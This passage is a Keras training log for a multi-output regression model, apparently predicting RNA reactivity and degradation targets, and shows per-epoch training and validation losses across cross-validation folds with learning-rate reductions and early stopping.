120/120 - 7s - loss: 5.2999 - output_react_loss: 0.5952 - output_bg_ph_loss: 0.6389 - output_ph_loss: 0.8436 - output_mg_c_loss: 0.6209 - output_c_loss: 0.7465 - val_loss: 4.5068 - val_output_react_loss: 0.5207 - val_output_bg_ph_loss: 0.6526 - val_output_ph_loss: 0.6002 - val_output_mg_c_loss: 0.5245 - val_output_c_loss: 0.5112
Epoch 15/70
120/120 - 7s - loss: 5.1306 - output_react_loss: 0.5741 - output_bg_ph_loss: 0.6185 - output_ph_loss: 0.8090 - output_mg_c_loss: 0.6039 - output_c_loss: 0.7288 - val_loss: 4.5211 - val_output_react_loss: 0.5159 - val_output_bg_ph_loss: 0.6546 - val_output_ph_loss: 0.6016 - val_output_mg_c_loss: 0.5362 - val_output_c_loss: 0.5062
Epoch 16/70
120/120 - 7s - loss: 5.1908 - output_react_loss: 0.5787 - output_bg_ph_loss: 0.6171 - output_ph_loss: 0.8378 - output_mg_c_loss: 0.6046 - output_c_loss: 0.7522 - val_loss: 4.4677 - val_output_react_loss: 0.5082 - val_output_bg_ph_loss: 0.6455 - val_output_ph_loss: 0.5972 - val_output_mg_c_loss: 0.5265 - val_output_c_loss: 0.5101
Epoch 17/70
120/120 - 7s - loss: 4.8559 - output_react_loss: 0.5465 - output_bg_ph_loss: 0.5882 - output_ph_loss: 0.7376 - output_mg_c_loss: 0.5721 - output_c_loss: 0.7048 - val_loss: 4.5045 - val_output_react_loss: 0.5143 - val_output_bg_ph_loss: 0.6495 - val_output_ph_loss: 0.6043 - val_output_mg_c_loss: 0.5306 - val_output_c_loss: 0.5113
Epoch 18/70
120/120 - 7s - loss: 5.0255 - output_react_loss: 0.5594 - output_bg_ph_loss: 0.5926 - output_ph_loss: 0.8123 - output_mg_c_loss: 0.5886 - output_c_loss: 0.7321 - val_loss: 4.4435 - val_output_react_loss: 0.5030 - val_output_bg_ph_loss: 0.6454 - val_output_ph_loss: 0.5924 - val_output_mg_c_loss: 0.5227 - val_output_c_loss: 0.5090
Epoch 19/70
120/120 - 7s - loss: 4.7977 - output_react_loss: 0.5330 - output_bg_ph_loss: 0.5742 - output_ph_loss: 0.7592 - output_mg_c_loss: 0.5608 - output_c_loss: 0.7026 - val_loss: 4.4516 - val_output_react_loss: 0.5021 - val_output_bg_ph_loss: 0.6497 - val_output_ph_loss: 0.5932 - val_output_mg_c_loss: 0.5239 - val_output_c_loss: 0.5071
Epoch 20/70
120/120 - 8s - loss: 4.8366 - output_react_loss: 0.5339 - output_bg_ph_loss: 0.5719 - output_ph_loss: 0.7718 - output_mg_c_loss: 0.5682 - output_c_loss: 0.7168 - val_loss: 4.5308 - val_output_react_loss: 0.5117 - val_output_bg_ph_loss: 0.6645 - val_output_ph_loss: 0.6015 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5107
Epoch 21/70
120/120 - 7s - loss: 4.7086 - output_react_loss: 0.5245 - output_bg_ph_loss: 0.5567 - output_ph_loss: 0.7528 - output_mg_c_loss: 0.5511 - output_c_loss: 0.6912 - val_loss: 4.4813 - val_output_react_loss: 0.5113 - val_output_bg_ph_loss: 0.6490 - val_output_ph_loss: 0.5986 - val_output_mg_c_loss: 0.5260 - val_output_c_loss: 0.5102
Epoch 22/70
120/120 - 7s - loss: 4.6421 - output_react_loss: 0.5127 - output_bg_ph_loss: 0.5502 - output_ph_loss: 0.7402 - output_mg_c_loss: 0.5398 - output_c_loss: 0.6963 - val_loss: 4.4557 - val_output_react_loss: 0.5040 - val_output_bg_ph_loss: 0.6519 - val_output_ph_loss: 0.5920 - val_output_mg_c_loss: 0.5232 - val_output_c_loss: 0.5055
Epoch 23/70
120/120 - 7s - loss: 4.6514 - output_react_loss: 0.5118 - output_bg_ph_loss: 0.5473 - output_ph_loss: 0.7576 - output_mg_c_loss: 0.5392 - output_c_loss: 0.6970 - val_loss: 4.4421 - val_output_react_loss: 0.5016 - val_output_bg_ph_loss: 0.6492 - val_output_ph_loss: 0.5928 - val_output_mg_c_loss: 0.5212 - val_output_c_loss: 0.5054
Epoch 24/70
120/120 - 7s - loss: 4.6099 - output_react_loss: 0.5030 - output_bg_ph_loss: 0.5386 - output_ph_loss: 0.7466 - output_mg_c_loss: 0.5384 - output_c_loss: 0.7033 - val_loss: 4.4646 - val_output_react_loss: 0.5075 - val_output_bg_ph_loss: 0.6508 - val_output_ph_loss: 0.5950 - val_output_mg_c_loss: 0.5218 - val_output_c_loss: 0.5094
Epoch 25/70
120/120 - 7s - loss: 4.6612 - output_react_loss: 0.5116 - output_bg_ph_loss: 0.5410 - output_ph_loss: 0.7671 - output_mg_c_loss: 0.5411 - output_c_loss: 0.7068 - val_loss: 4.4891 - val_output_react_loss: 0.5045 - val_output_bg_ph_loss: 0.6496 - val_output_ph_loss: 0.5954 - val_output_mg_c_loss: 0.5386 - val_output_c_loss: 0.5082
Epoch 26/70
120/120 - 7s - loss: 4.4395 - output_react_loss: 0.4891 - output_bg_ph_loss: 0.5246 - output_ph_loss: 0.7109 - output_mg_c_loss: 0.5179 - output_c_loss: 0.6654 - val_loss: 4.4417 - val_output_react_loss: 0.5011 - val_output_bg_ph_loss: 0.6438 - val_output_ph_loss: 0.5984 - val_output_mg_c_loss: 0.5237 - val_output_c_loss: 0.5061
Epoch 27/70
120/120 - 7s - loss: 4.5181 - output_react_loss: 0.4952 - output_bg_ph_loss: 0.5245 - output_ph_loss: 0.7437 - output_mg_c_loss: 0.5240 - output_c_loss: 0.6870 - val_loss: 4.4796 - val_output_react_loss: 0.5024 - val_output_bg_ph_loss: 0.6477 - val_output_ph_loss: 0.6034 - val_output_mg_c_loss: 0.5297 - val_output_c_loss: 0.5165
Epoch 28/70
120/120 - 7s - loss: 4.2343 - output_react_loss: 0.4702 - output_bg_ph_loss: 0.4963 - output_ph_loss: 0.6728 - output_mg_c_loss: 0.4927 - output_c_loss: 0.6430 - val_loss: 4.4593 - val_output_react_loss: 0.5024 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.5952 - val_output_mg_c_loss: 0.5253 - val_output_c_loss: 0.5161
Epoch 29/70
120/120 - 7s - loss: 4.4013 - output_react_loss: 0.4723 - output_bg_ph_loss: 0.5051 - output_ph_loss: 0.7193 - output_mg_c_loss: 0.5269 - output_c_loss: 0.6734 - val_loss: 4.4265 - val_output_react_loss: 0.4955 - val_output_bg_ph_loss: 0.6460 - val_output_ph_loss: 0.5921 - val_output_mg_c_loss: 0.5239 - val_output_c_loss: 0.5036
Epoch 30/70
120/120 - 7s - loss: 4.3896 - output_react_loss: 0.4825 - output_bg_ph_loss: 0.5062 - output_ph_loss: 0.7201 - output_mg_c_loss: 0.5048 - output_c_loss: 0.6827 - val_loss: 4.4442 - val_output_react_loss: 0.5034 - val_output_bg_ph_loss: 0.6440 - val_output_ph_loss: 0.5901 - val_output_mg_c_loss: 0.5254 - val_output_c_loss: 0.5084
Epoch 31/70
120/120 - 7s - loss: 4.4621 - output_react_loss: 0.4806 - output_bg_ph_loss: 0.5130 - output_ph_loss: 0.7569 - output_mg_c_loss: 0.5145 - output_c_loss: 0.6892 - val_loss: 4.4552 - val_output_react_loss: 0.5004 - val_output_bg_ph_loss: 0.6472 - val_output_ph_loss: 0.5983 - val_output_mg_c_loss: 0.5229 - val_output_c_loss: 0.5160
Epoch 32/70
120/120 - 7s - loss: 4.2475 - output_react_loss: 0.4605 - output_bg_ph_loss: 0.4863 - output_ph_loss: 0.6962 - output_mg_c_loss: 0.4949 - output_c_loss: 0.6682 - val_loss: 4.4139 - val_output_react_loss: 0.4989 - val_output_bg_ph_loss: 0.6431 - val_output_ph_loss: 0.5878 - val_output_mg_c_loss: 0.5178 - val_output_c_loss: 0.5063
Epoch 33/70
120/120 - 7s - loss: 4.1801 - output_react_loss: 0.4557 - output_bg_ph_loss: 0.4810 - output_ph_loss: 0.6817 - output_mg_c_loss: 0.4887 - output_c_loss: 0.6477 - val_loss: 4.4204 - val_output_react_loss: 0.5017 - val_output_bg_ph_loss: 0.6414 - val_output_ph_loss: 0.5897 - val_output_mg_c_loss: 0.5185 - val_output_c_loss: 0.5075
Epoch 34/70
120/120 - 7s - loss: 4.2968 - output_react_loss: 0.4597 - output_bg_ph_loss: 0.4961 - output_ph_loss: 0.7081 - output_mg_c_loss: 0.5014 - output_c_loss: 0.6743 - val_loss: 4.4172 - val_output_react_loss: 0.4957 - val_output_bg_ph_loss: 0.6441 - val_output_ph_loss: 0.5912 - val_output_mg_c_loss: 0.5202 - val_output_c_loss: 0.5060
Epoch 35/70
120/120 - 7s - loss: 4.1495 - output_react_loss: 0.4533 - output_bg_ph_loss: 0.4722 - output_ph_loss: 0.6871 - output_mg_c_loss: 0.4812 - output_c_loss: 0.6492 - val_loss: 4.4591 - val_output_react_loss: 0.5022 - val_output_bg_ph_loss: 0.6493 - val_output_ph_loss: 0.5941 - val_output_mg_c_loss: 0.5252 - val_output_c_loss: 0.5116
Epoch 36/70
120/120 - 8s - loss: 4.0763 - output_react_loss: 0.4397 - output_bg_ph_loss: 0.4645 - output_ph_loss: 0.6734 - output_mg_c_loss: 0.4782 - output_c_loss: 0.6381 - val_loss: 4.4036 - val_output_react_loss: 0.4951 - val_output_bg_ph_loss: 0.6432 - val_output_ph_loss: 0.5894 - val_output_mg_c_loss: 0.5171 - val_output_c_loss: 0.5035
Epoch 37/70
120/120 - 7s - loss: 4.1241 - output_react_loss: 0.4450 - output_bg_ph_loss: 0.4707 - output_ph_loss: 0.6836 - output_mg_c_loss: 0.4806 - output_c_loss: 0.6479 - val_loss: 4.4011 - val_output_react_loss: 0.4963 - val_output_bg_ph_loss: 0.6378 - val_output_ph_loss: 0.5897 - val_output_mg_c_loss: 0.5173 - val_output_c_loss: 0.5087
Epoch 38/70
120/120 - 7s - loss: 4.1484 - output_react_loss: 0.4457 - output_bg_ph_loss: 0.4703 - output_ph_loss: 0.7004 - output_mg_c_loss: 0.4808 - output_c_loss: 0.6545 - val_loss: 4.4141 - val_output_react_loss: 0.4966 - val_output_bg_ph_loss: 0.6414 - val_output_ph_loss: 0.5913 - val_output_mg_c_loss: 0.5210 - val_output_c_loss: 0.5046
Epoch 39/70
120/120 - 7s - loss: 4.2517 - output_react_loss: 0.4578 - output_bg_ph_loss: 0.4794 - output_ph_loss: 0.7088 - output_mg_c_loss: 0.4968 - output_c_loss: 0.6750 - val_loss: 4.4511 - val_output_react_loss: 0.4998 - val_output_bg_ph_loss: 0.6463 - val_output_ph_loss: 0.6013 - val_output_mg_c_loss: 0.5233 - val_output_c_loss: 0.5109
Epoch 40/70
120/120 - 7s - loss: 4.0662 - output_react_loss: 0.4374 - output_bg_ph_loss: 0.4607 - output_ph_loss: 0.6695 - output_mg_c_loss: 0.4729 - output_c_loss: 0.6544 - val_loss: 4.4141 - val_output_react_loss: 0.5001 - val_output_bg_ph_loss: 0.6404 - val_output_ph_loss: 0.5905 - val_output_mg_c_loss: 0.5186 - val_output_c_loss: 0.5056
Epoch 41/70
120/120 - 7s - loss: 3.8941 - output_react_loss: 0.4138 - output_bg_ph_loss: 0.4496 - output_ph_loss: 0.6444 - output_mg_c_loss: 0.4510 - output_c_loss: 0.6209 - val_loss: 4.4168 - val_output_react_loss: 0.4977 - val_output_bg_ph_loss: 0.6417 - val_output_ph_loss: 0.5949 - val_output_mg_c_loss: 0.5181 - val_output_c_loss: 0.5070
Epoch 42/70
Epoch 00042: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513.
120/120 - 7s - loss: 4.1502 - output_react_loss: 0.4426 - output_bg_ph_loss: 0.4664 - output_ph_loss: 0.6960 - output_mg_c_loss: 0.4868 - output_c_loss: 0.6625 - val_loss: 4.4021 - val_output_react_loss: 0.4957 - val_output_bg_ph_loss: 0.6418 - val_output_ph_loss: 0.5860 - val_output_mg_c_loss: 0.5186 - val_output_c_loss: 0.5040
Epoch 43/70
120/120 - 7s - loss: 3.8376 - output_react_loss: 0.4166 - output_bg_ph_loss: 0.4320 - output_ph_loss: 0.6376 - output_mg_c_loss: 0.4413 - output_c_loss: 0.6202 - val_loss: 4.3635 - val_output_react_loss: 0.4917 - val_output_bg_ph_loss: 0.6368 - val_output_ph_loss: 0.5831 - val_output_mg_c_loss: 0.5129 - val_output_c_loss: 0.4978
Epoch 44/70
120/120 - 7s - loss: 3.7882 - output_react_loss: 0.4002 - output_bg_ph_loss: 0.4222 - output_ph_loss: 0.6415 - output_mg_c_loss: 0.4426 - output_c_loss: 0.6167 - val_loss: 4.3476 - val_output_react_loss: 0.4887 - val_output_bg_ph_loss: 0.6351 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5106 - val_output_c_loss: 0.4974
Epoch 45/70
120/120 - 7s - loss: 3.7885 - output_react_loss: 0.4035 - output_bg_ph_loss: 0.4196 - output_ph_loss: 0.6485 - output_mg_c_loss: 0.4403 - output_c_loss: 0.6132 - val_loss: 4.3480 - val_output_react_loss: 0.4893 - val_output_bg_ph_loss: 0.6345 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5105 - val_output_c_loss: 0.4981
Epoch 46/70
120/120 - 7s - loss: 3.9172 - output_react_loss: 0.4131 - output_bg_ph_loss: 0.4344 - output_ph_loss: 0.6645 - output_mg_c_loss: 0.4510 - output_c_loss: 0.6555 - val_loss: 4.3521 - val_output_react_loss: 0.4891 - val_output_bg_ph_loss: 0.6358 - val_output_ph_loss: 0.5817 - val_output_mg_c_loss: 0.5113 - val_output_c_loss: 0.4981
Epoch 47/70
120/120 - 7s - loss: 3.8257 - output_react_loss: 0.4088 - output_bg_ph_loss: 0.4219 - output_ph_loss: 0.6486 - output_mg_c_loss: 0.4438 - output_c_loss: 0.6281 - val_loss: 4.3550 - val_output_react_loss: 0.4909 - val_output_bg_ph_loss: 0.6359 - val_output_ph_loss: 0.5818 - val_output_mg_c_loss: 0.5110 - val_output_c_loss: 0.4977
Epoch 48/70
120/120 - 7s - loss: 3.6280 - output_react_loss: 0.3876 - output_bg_ph_loss: 0.4024 - output_ph_loss: 0.6122 - output_mg_c_loss: 0.4184 - output_c_loss: 0.5991 - val_loss: 4.3525 - val_output_react_loss: 0.4897 - val_output_bg_ph_loss: 0.6355 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5109 - val_output_c_loss: 0.4990
Epoch 49/70
Epoch 00049: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05.
120/120 - 7s - loss: 3.6680 - output_react_loss: 0.3882 - output_bg_ph_loss: 0.4083 - output_ph_loss: 0.6171 - output_mg_c_loss: 0.4273 - output_c_loss: 0.6033 - val_loss: 4.3544 - val_output_react_loss: 0.4894 - val_output_bg_ph_loss: 0.6365 - val_output_ph_loss: 0.5815 - val_output_mg_c_loss: 0.5111 - val_output_c_loss: 0.4988
Epoch 50/70
120/120 - 7s - loss: 3.8273 - output_react_loss: 0.4043 - output_bg_ph_loss: 0.4246 - output_ph_loss: 0.6552 - output_mg_c_loss: 0.4440 - output_c_loss: 0.6263 - val_loss: 4.3520 - val_output_react_loss: 0.4888 - val_output_bg_ph_loss: 0.6361 - val_output_ph_loss: 0.5814 - val_output_mg_c_loss: 0.5113 - val_output_c_loss: 0.4981
Epoch 51/70
120/120 - 7s - loss: 3.7274 - output_react_loss: 0.3981 - output_bg_ph_loss: 0.4092 - output_ph_loss: 0.6250 - output_mg_c_loss: 0.4293 - output_c_loss: 0.6293 - val_loss: 4.3505 - val_output_react_loss: 0.4884 - val_output_bg_ph_loss: 0.6360 - val_output_ph_loss: 0.5816 - val_output_mg_c_loss: 0.5112 - val_output_c_loss: 0.4977
Epoch 52/70
120/120 - 7s - loss: 3.6490 - output_react_loss: 0.3857 - output_bg_ph_loss: 0.4046 - output_ph_loss: 0.6147 - output_mg_c_loss: 0.4234 - output_c_loss: 0.6068 - val_loss: 4.3496 - val_output_react_loss: 0.4886 - val_output_bg_ph_loss: 0.6357 - val_output_ph_loss: 0.5816 - val_output_mg_c_loss: 0.5108 - val_output_c_loss: 0.4978
Epoch 53/70
120/120 - 7s - loss: 3.7603 - output_react_loss: 0.3971 - output_bg_ph_loss: 0.4124 - output_ph_loss: 0.6570 - output_mg_c_loss: 0.4288 - output_c_loss: 0.6266 - val_loss: 4.3507 - val_output_react_loss: 0.4887 - val_output_bg_ph_loss: 0.6356 - val_output_ph_loss: 0.5816 - val_output_mg_c_loss: 0.5111 - val_output_c_loss: 0.4982
Epoch 54/70
Restoring model weights from the end of the best epoch.
Epoch 00054: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06.
120/120 - 7s - loss: 3.7694 - output_react_loss: 0.3981 - output_bg_ph_loss: 0.4149 - output_ph_loss: 0.6489 - output_mg_c_loss: 0.4337 - output_c_loss: 0.6269 - val_loss: 4.3503 - val_output_react_loss: 0.4886 - val_output_bg_ph_loss: 0.6355 - val_output_ph_loss: 0.5817 - val_output_mg_c_loss: 0.5111 - val_output_c_loss: 0.4981
Epoch 00054: early stopping
FOLD: 3
Epoch 1/70
120/120 - 9s - loss: 8.8878 - output_react_loss: 0.9465 - output_bg_ph_loss: 1.1514 - output_ph_loss: 1.3084 - output_mg_c_loss: 1.1391 - output_c_loss: 1.1053 - val_loss: 6.8064 - val_output_react_loss: 0.7579 - val_output_bg_ph_loss: 0.9719 - val_output_ph_loss: 0.8874 - val_output_mg_c_loss: 0.8577 - val_output_c_loss: 0.7440
Epoch 2/70
120/120 - 7s - loss: 7.5866 - output_react_loss: 0.8103 - output_bg_ph_loss: 0.9564 - output_ph_loss: 1.1300 - output_mg_c_loss: 0.9663 - output_c_loss: 0.9906 - val_loss: 5.9556 - val_output_react_loss: 0.6788 - val_output_bg_ph_loss: 0.8620 - val_output_ph_loss: 0.7972 - val_output_mg_c_loss: 0.7089 - val_output_c_loss: 0.6591
Epoch 3/70
120/120 - 7s - loss: 7.1029 - output_react_loss: 0.7670 - output_bg_ph_loss: 0.8975 - output_ph_loss: 1.0765 - output_mg_c_loss: 0.8802 - output_c_loss: 0.9372 - val_loss: 5.5450 - val_output_react_loss: 0.6525 - val_output_bg_ph_loss: 0.7868 - val_output_ph_loss: 0.7563 - val_output_mg_c_loss: 0.6494 - val_output_c_loss: 0.6112
Epoch 4/70
120/120 - 7s - loss: 6.6969 - output_react_loss: 0.7376 - output_bg_ph_loss: 0.8420 - output_ph_loss: 1.0159 - output_mg_c_loss: 0.8264 - output_c_loss: 0.8691 - val_loss: 5.2467 - val_output_react_loss: 0.6092 - val_output_bg_ph_loss: 0.7460 - val_output_ph_loss: 0.7138 - val_output_mg_c_loss: 0.6214 - val_output_c_loss: 0.5797
Epoch 5/70
120/120 - 7s - loss: 6.4476 - output_react_loss: 0.7109 - output_bg_ph_loss: 0.8136 - output_ph_loss: 0.9755 - output_mg_c_loss: 0.7868 - output_c_loss: 0.8494 - val_loss: 5.0943 - val_output_react_loss: 0.5976 - val_output_bg_ph_loss: 0.7243 - val_output_ph_loss: 0.7027 - val_output_mg_c_loss: 0.5918 - val_output_c_loss: 0.5641
Epoch 6/70
120/120 - 7s - loss: 6.3095 - output_react_loss: 0.7026 - output_bg_ph_loss: 0.7853 - output_ph_loss: 0.9685 - output_mg_c_loss: 0.7654 - output_c_loss: 0.8344 - val_loss: 4.9502 - val_output_react_loss: 0.5770 - val_output_bg_ph_loss: 0.7029 - val_output_ph_loss: 0.6805 - val_output_mg_c_loss: 0.5747 - val_output_c_loss: 0.5605
Epoch 7/70
120/120 - 7s - loss: 6.0598 - output_react_loss: 0.6725 - output_bg_ph_loss: 0.7548 - output_ph_loss: 0.9201 - output_mg_c_loss: 0.7363 - output_c_loss: 0.8123 - val_loss: 4.8857 - val_output_react_loss: 0.5688 - val_output_bg_ph_loss: 0.6976 - val_output_ph_loss: 0.6561 - val_output_mg_c_loss: 0.5791 - val_output_c_loss: 0.5388
Epoch 8/70
120/120 - 7s - loss: 6.0025 - output_react_loss: 0.6656 - output_bg_ph_loss: 0.7450 - output_ph_loss: 0.9193 - output_mg_c_loss: 0.7267 - output_c_loss: 0.8085 - val_loss: 4.8275 - val_output_react_loss: 0.5589 - val_output_bg_ph_loss: 0.6901 - val_output_ph_loss: 0.6632 - val_output_mg_c_loss: 0.5609 - val_output_c_loss: 0.5444
Epoch 9/70
120/120 - 7s - loss: 5.8000 - output_react_loss: 0.6429 - output_bg_ph_loss: 0.7186 - output_ph_loss: 0.8900 - output_mg_c_loss: 0.6959 - output_c_loss: 0.7954 - val_loss: 4.8379 - val_output_react_loss: 0.5601 - val_output_bg_ph_loss: 0.6958 - val_output_ph_loss: 0.6618 - val_output_mg_c_loss: 0.5629 - val_output_c_loss: 0.5385
Epoch 10/70
120/120 - 7s - loss: 5.7426 - output_react_loss: 0.6346 - output_bg_ph_loss: 0.7066 - output_ph_loss: 0.8856 - output_mg_c_loss: 0.6923 - output_c_loss: 0.7900 - val_loss: 4.7528 - val_output_react_loss: 0.5533 - val_output_bg_ph_loss: 0.6816 - val_output_ph_loss: 0.6431 - val_output_mg_c_loss: 0.5523 - val_output_c_loss: 0.5353
Epoch 11/70
120/120 - 7s - loss: 5.5888 - output_react_loss: 0.6175 - output_bg_ph_loss: 0.6880 - output_ph_loss: 0.8729 - output_mg_c_loss: 0.6694 - output_c_loss: 0.7663 - val_loss: 4.6962 - val_output_react_loss: 0.5468 - val_output_bg_ph_loss: 0.6738 - val_output_ph_loss: 0.6295 - val_output_mg_c_loss: 0.5505 - val_output_c_loss: 0.5243
Epoch 12/70
120/120 - 7s - loss: 5.4090 - output_react_loss: 0.6094 - output_bg_ph_loss: 0.6587 - output_ph_loss: 0.8390 - output_mg_c_loss: 0.6427 - output_c_loss: 0.7485 - val_loss: 4.6933 - val_output_react_loss: 0.5430 - val_output_bg_ph_loss: 0.6665 - val_output_ph_loss: 0.6346 - val_output_mg_c_loss: 0.5538 - val_output_c_loss: 0.5320
Epoch 13/70
120/120 - 7s - loss: 5.2612 - output_react_loss: 0.5896 - output_bg_ph_loss: 0.6432 - output_ph_loss: 0.8160 - output_mg_c_loss: 0.6258 - output_c_loss: 0.7279 - val_loss: 4.7046 - val_output_react_loss: 0.5389 - val_output_bg_ph_loss: 0.6817 - val_output_ph_loss: 0.6311 - val_output_mg_c_loss: 0.5543 - val_output_c_loss: 0.5237
Epoch 14/70
120/120 - 7s - loss: 5.2187 - output_react_loss: 0.5794 - output_bg_ph_loss: 0.6374 - output_ph_loss: 0.8238 - output_mg_c_loss: 0.6175 - output_c_loss: 0.7265 - val_loss: 4.6621 - val_output_react_loss: 0.5476 - val_output_bg_ph_loss: 0.6648 - val_output_ph_loss: 0.6268 - val_output_mg_c_loss: 0.5409 - val_output_c_loss: 0.5285
Epoch 15/70
120/120 - 7s - loss: 5.3190 - output_react_loss: 0.5846 - output_bg_ph_loss: 0.6397 - output_ph_loss: 0.8447 - output_mg_c_loss: 0.6308 - output_c_loss: 0.7639 - val_loss: 4.6176 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6655 - val_output_ph_loss: 0.6204 - val_output_mg_c_loss: 0.5372 - val_output_c_loss: 0.5199
Epoch 16/70
120/120 - 7s - loss: 5.0473 - output_react_loss: 0.5641 - output_bg_ph_loss: 0.6095 - output_ph_loss: 0.8032 - output_mg_c_loss: 0.5915 - output_c_loss: 0.7138 - val_loss: 4.6430 - val_output_react_loss: 0.5349 - val_output_bg_ph_loss: 0.6725 - val_output_ph_loss: 0.6229 - val_output_mg_c_loss: 0.5424 - val_output_c_loss: 0.5205
Epoch 17/70
120/120 - 7s - loss: 4.9326 - output_react_loss: 0.5489 - output_bg_ph_loss: 0.5868 - output_ph_loss: 0.7831 - output_mg_c_loss: 0.5786 - output_c_loss: 0.7209 - val_loss: 4.5794 - val_output_react_loss: 0.5290 - val_output_bg_ph_loss: 0.6614 - val_output_ph_loss: 0.6149 - val_output_mg_c_loss: 0.5338 - val_output_c_loss: 0.5161
Epoch 18/70
120/120 - 7s - loss: 4.9355 - output_react_loss: 0.5483 - output_bg_ph_loss: 0.5927 - output_ph_loss: 0.7782 - output_mg_c_loss: 0.5787 - output_c_loss: 0.7180 - val_loss: 4.6358 - val_output_react_loss: 0.5300 - val_output_bg_ph_loss: 0.6729 - val_output_ph_loss: 0.6295 - val_output_mg_c_loss: 0.5395 - val_output_c_loss: 0.5215
Epoch 19/70
120/120 - 8s - loss: 5.0316 - output_react_loss: 0.5538 - output_bg_ph_loss: 0.5885 - output_ph_loss: 0.8241 - output_mg_c_loss: 0.5893 - output_c_loss: 0.7444 - val_loss: 4.6052 - val_output_react_loss: 0.5313 - val_output_bg_ph_loss: 0.6665 - val_output_ph_loss: 0.6143 - val_output_mg_c_loss: 0.5373 - val_output_c_loss: 0.5206
Epoch 20/70
120/120 - 7s - loss: 4.7251 - output_react_loss: 0.5275 - output_bg_ph_loss: 0.5618 - output_ph_loss: 0.7502 - output_mg_c_loss: 0.5501 - output_c_loss: 0.6961 - val_loss: 4.5849 - val_output_react_loss: 0.5374 - val_output_bg_ph_loss: 0.6602 - val_output_ph_loss: 0.6142 - val_output_mg_c_loss: 0.5287 - val_output_c_loss: 0.5181
Epoch 21/70
120/120 - 7s - loss: 4.6258 - output_react_loss: 0.5121 - output_bg_ph_loss: 0.5549 - output_ph_loss: 0.7380 - output_mg_c_loss: 0.5426 - output_c_loss: 0.6686 - val_loss: 4.5551 - val_output_react_loss: 0.5311 - val_output_bg_ph_loss: 0.6546 - val_output_ph_loss: 0.6146 - val_output_mg_c_loss: 0.5248 - val_output_c_loss: 0.5197
Epoch 22/70
120/120 - 7s - loss: 4.7790 - output_react_loss: 0.5214 - output_bg_ph_loss: 0.5564 - output_ph_loss: 0.7906 - output_mg_c_loss: 0.5594 - output_c_loss: 0.7140 - val_loss: 4.5911 - val_output_react_loss: 0.5309 - val_output_bg_ph_loss: 0.6656 - val_output_ph_loss: 0.6121 - val_output_mg_c_loss: 0.5339 - val_output_c_loss: 0.5181
Epoch 23/70
120/120 - 7s - loss: 4.6777 - output_react_loss: 0.5160 - output_bg_ph_loss: 0.5486 - output_ph_loss: 0.7594 - output_mg_c_loss: 0.5436 - output_c_loss: 0.7019 - val_loss: 4.5732 - val_output_react_loss: 0.5345 - val_output_bg_ph_loss: 0.6562 - val_output_ph_loss: 0.6131 - val_output_mg_c_loss: 0.5282 - val_output_c_loss: 0.5224
Epoch 24/70
120/120 - 7s - loss: 4.6942 - output_react_loss: 0.5073 - output_bg_ph_loss: 0.5480 - output_ph_loss: 0.7827 - output_mg_c_loss: 0.5429 - output_c_loss: 0.7151 - val_loss: 4.5363 - val_output_react_loss: 0.5251 - val_output_bg_ph_loss: 0.6569 - val_output_ph_loss: 0.6108 - val_output_mg_c_loss: 0.5240 - val_output_c_loss: 0.5135
Epoch 25/70
120/120 - 7s - loss: 4.4474 - output_react_loss: 0.4898 - output_bg_ph_loss: 0.5233 - output_ph_loss: 0.7180 - output_mg_c_loss: 0.5243 - output_c_loss: 0.6546 - val_loss: 4.5785 - val_output_react_loss: 0.5333 - val_output_bg_ph_loss: 0.6567 - val_output_ph_loss: 0.6147 - val_output_mg_c_loss: 0.5327 - val_output_c_loss: 0.5183
Epoch 26/70
120/120 - 7s - loss: 4.4364 - output_react_loss: 0.4836 - output_bg_ph_loss: 0.5196 - output_ph_loss: 0.7170 - output_mg_c_loss: 0.5190 - output_c_loss: 0.6751 - val_loss: 4.5358 - val_output_react_loss: 0.5244 - val_output_bg_ph_loss: 0.6547 - val_output_ph_loss: 0.6109 - val_output_mg_c_loss: 0.5261 - val_output_c_loss: 0.5144
Epoch 27/70
120/120 - 7s - loss: 4.5330 - output_react_loss: 0.4975 - output_bg_ph_loss: 0.5284 - output_ph_loss: 0.7392 - output_mg_c_loss: 0.5278 - output_c_loss: 0.6863 - val_loss: 4.5744 - val_output_react_loss: 0.5281 - val_output_bg_ph_loss: 0.6655 - val_output_ph_loss: 0.6125 - val_output_mg_c_loss: 0.5286 - val_output_c_loss: 0.5174
Epoch 28/70
120/120 - 7s - loss: 4.3557 - output_react_loss: 0.4810 - output_bg_ph_loss: 0.5061 - output_ph_loss: 0.7059 - output_mg_c_loss: 0.5066 - output_c_loss: 0.6622 - val_loss: 4.5536 - val_output_react_loss: 0.5334 - val_output_bg_ph_loss: 0.6568 - val_output_ph_loss: 0.6090 - val_output_mg_c_loss: 0.5254 - val_output_c_loss: 0.5135
Epoch 29/70
120/120 - 7s - loss: 4.4306 - output_react_loss: 0.4779 - output_bg_ph_loss: 0.5091 - output_ph_loss: 0.7387 - output_mg_c_loss: 0.5172 - output_c_loss: 0.6837 - val_loss: 4.6267 - val_output_react_loss: 0.5371 - val_output_bg_ph_loss: 0.6648 - val_output_ph_loss: 0.6151 - val_output_mg_c_loss: 0.5398 - val_output_c_loss: 0.5282
Epoch 30/70
120/120 - 7s - loss: 4.5029 - output_react_loss: 0.4844 - output_bg_ph_loss: 0.5150 - output_ph_loss: 0.7510 - output_mg_c_loss: 0.5286 - output_c_loss: 0.6959 - val_loss: 4.5810 - val_output_react_loss: 0.5327 - val_output_bg_ph_loss: 0.6646 - val_output_ph_loss: 0.6125 - val_output_mg_c_loss: 0.5286 - val_output_c_loss: 0.5167
Epoch 31/70
Epoch 00031: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513.
120/120 - 7s - loss: 4.4161 - output_react_loss: 0.4745 - output_bg_ph_loss: 0.5149 - output_ph_loss: 0.7337 - output_mg_c_loss: 0.5139 - output_c_loss: 0.6759 - val_loss: 4.5696 - val_output_react_loss: 0.5333 - val_output_bg_ph_loss: 0.6593 - val_output_ph_loss: 0.6123 - val_output_mg_c_loss: 0.5279 - val_output_c_loss: 0.5163
Epoch 32/70
